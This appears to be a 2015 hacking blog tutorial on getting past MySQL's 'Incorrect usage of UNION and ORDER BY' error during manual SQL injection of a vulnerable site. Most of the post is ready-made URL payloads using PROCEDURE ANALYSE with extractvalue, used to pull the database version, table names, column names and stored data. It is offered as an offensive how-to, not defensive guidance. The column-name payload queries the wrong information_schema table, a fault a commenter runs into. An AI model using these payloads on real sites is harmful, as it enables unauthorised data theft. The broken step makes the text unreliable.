Social Icons

Wednesday, 8 July 2015

Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial

Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial

Bypassing Incorrect usage of UNION and ORDER BY -Tutorial By RAi Jee
In Previous tutorial we Have Discuss about
Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted
Today's our Topic is how can we Bypass the Incorrect Usage of UNION and ORDER BY .
So Lets start our Manual Injection .Our Target Site is Vulnerable To SQL Injection.

Now Will try to Find the Total number of columns. Hmmm we will use ORDER BY for Counting Columns.
Here is our Query

http://www.FakSite.com/detail.php?id=12 order by 6-- -

We Got ERROR Here !!!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 5-- -,10' at line 1





Lets Decrease our Columns Count from 6 to 3
http://www.FakSite.com/detail.php?id=12 order by 3-- -

Still The Same ERROR !!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 3 -- -,10' at line 1

Now Try Only One Column For Order by Command




http://www.FakSite.com/detail.php?id=12 order by 1-- -

We Got The Same Again

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- -,10' at line 1

Again The Same Error as We have Also Put 1 Column for Columns Count.So now We will Try To Guess The Number of Columns by Own.
So We Will Give Command for UNION SELECT Statement with 3 columns.
And Our Query Will be

http://www.FakSite.com/detail.php?id=12 UnION SEleCT 1,2,3-- -

After Executing our Query we Got the Error !!
Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial
We Got Error of  "Incorrect usage of UNION and ORDER BY"
hmmm  as you can See here we Cannot inject with UNION SELECT Query.
So we Use Procedure Analyse with Xpath Extractvalue Query to Bypass the Error of Incorrect Usage of UNION and ORDER BY.
Then Here is Query of  Procedure Analyse with Xpath Extractvalue :

http://www.FakSite.com/detail.php?id=12 Procedure Analyse (extractvalue(0,concat(0x27,0x524169204a6565,0x3a,@@version)),1)-- -

BinGOOOO The Error is Gone !!!

Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial
As we Have Give Query For VERSION You Can See the Version in above Picture.

Now Lets Add The Query for Tables :
http://www.FakSite.com/detail.php?id=12 Procedure Analyse (extractvalue(0,concat(0x27,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)-- -
Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial
And We Got Tables there but we can see only Some Tables name there.
For All Tables we will add substr Function in our Query to Get All Other tables from the database.
http://www.FakSite.com/detail.php?id=12 Procedure Analyse (extractvalue(0,concat(0x27,(select substr(group_concat(table_name),10,50) from information_schema.tables where table_schema=database()))),1)-- -

Increase the value of 10,50 in the Query to get other tables in the Database.
Then Next we have to Get the Column names from the our Targeted Table.
Here is Query for Getting Column names

http://www.FakSite.com/detail.php?id=12 Procedure Analyse (extractvalue(0,concat(0x27,(select group_concat(column_name) from information_schema.tables where table_name='OUR TABLE_NAME HERE'))),1)-- -

and The Last Part is Extracting Data from columns.
Here is The Final Query for Extracting data from Columns

http://www.FakSite.com/detail.php?id=12 Procedure Analyse (extractvalue(0,concat(0x27,(select group_concat(OUR_COLUMN_HERE) from OUR_TABLE_NAME_HERE))),1)-- -

AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee

2 comments:

  1. Your blog has given me that thing which I never expect to get from all over the websites. Nice post guys!

    App Developer

    ReplyDelete
  2. when I put Procedure Analyse (extractvalue(0,concat(0x27,(select group_concat(column_name) from information_schema.tables where table_name='OUR TABLE_NAME HERE'))),1)-- -, I get the following message: Warning: Unknown column 'column_name' in 'field list'.
    You know how resolve it?

    ReplyDelete